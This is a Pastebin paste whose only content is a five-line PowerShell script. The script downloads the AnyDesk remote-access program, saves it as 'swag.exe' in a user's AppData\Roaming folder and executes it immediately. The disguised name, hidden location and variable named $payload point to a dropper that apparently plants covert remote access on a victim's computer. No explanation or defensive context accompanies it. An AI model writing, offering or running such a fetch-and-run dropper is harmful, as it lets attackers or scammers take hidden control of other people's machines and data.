Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $downloader = New-Object System.Net.WebClient
- $payload = "http://download.anydesk.com/AnyDesk.exe"
- $local_file = "C:\Users\Josh\AppData\Roaming\swag.exe"
- $downloader.DownloadFile($payload, $local_file)
- & $local_file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement